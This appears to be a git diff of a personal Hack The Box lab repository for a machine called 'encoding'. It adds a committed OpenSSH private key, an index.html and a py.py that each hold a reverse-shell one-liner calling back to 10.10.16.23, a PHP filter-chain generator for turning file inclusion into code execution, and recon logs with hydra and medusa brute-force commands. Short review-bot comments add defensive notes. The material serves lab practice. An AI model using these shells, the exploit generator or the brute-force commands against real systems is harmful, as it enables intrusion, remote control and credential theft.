for pack in ${packs[*]}
do
QUEUE+=("objects/pack/$pack.pack")
QUEUE+=("objects/pack/$pack.idx")
done
}
start_download

38
HTB/encoding/id_rsa Normal file

@@ -0,0 +1,38 @@
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
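Review bot: This section commits an OpenSSH private key, with id_rsa.pub alongside it, and a key that has been pushed stays readable in history even if a later commit deletes the file. Unless it is a throwaway lab key, it should be treated as disclosed: rotate it and remove the public half from any `authorized_keys` that trusts it. Key files are better kept out of the tree altogether, with `.gitignore` entries such as `id_rsa` and `id_rsa.pub`, and a secret scanner in pre-commit or CI would catch the `BEGIN OPENSSH PRIVATE KEY` marker before it lands.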

1
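--- a/HTB/encoding/id_rsa.pub
+++ b/HTB/encoding/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa 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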

1
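--- a/HTB/encoding/index.html
+++ b/HTB/encoding/index.html
@@ -0,0 +1 @@
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.23 9001 >/tmp/f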

10
HTB/encoding/main.py Normal file

File diff suppressed because one or more lines are too long


@@ -0,0 +1,137 @@
#!/usr/bin/env python3
import argparse
import base64
import re
# - Useful infos -
# https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
# https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
# https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d
# No need to guess a valid filename anymore
file_to_use = "php://temp"
conversions = {
'0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
'1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
'2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
'3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
'4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
'5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
'6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
'7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
'8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64=False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain",
help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)",
required=False)
parser.add_argument("--rawbase64",
help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.",
required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print(
"[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain,
base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()

1
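--- a/HTB/encoding/py.py
+++ b/HTB/encoding/py.py
@@ -0,0 +1 @@
+python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.23",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'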
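Review bot: `py.py` holds a shell command line (`python3 -c '…'`), not Python source, so the `.py` extension misleads linters, syntax highlighters and anyone searching the repository by file type; a `.sh` or `.txt` name would match the content. The callback address `10.10.16.23` and port `9002` are hard-coded, and nothing in the file says which lab it belonged to; a leading comment such as `# HTB encoding lab: callback one-liner, lab-only address` would record the scope. For readers on the detection side, the recognisable pattern here is a `python3 -c` process that duplicates a socket descriptor onto fds 0, 1 and 2 and then starts `/bin/bash` through `pty`, which command-line and process-lineage auditing can flag.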


@@ -0,0 +1,24 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ssh found on tcp/22.
[*] http found on tcp/80.


@@ -0,0 +1,81 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: IwDcITnyfroNmHvjuTwI.encoding.htb" http://encoding.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://encoding.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.encoding.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_encoding.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: CaVSHfCVQYqVqvUahOxO.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
```


@@ -0,0 +1,99 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
```


@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.52 (Ubuntu)


@@ -0,0 +1,66 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
```
[/home/kali/htb/results/scans/_full_tcp_nmap.txt](file:///home/kali/htb/results/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 71s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
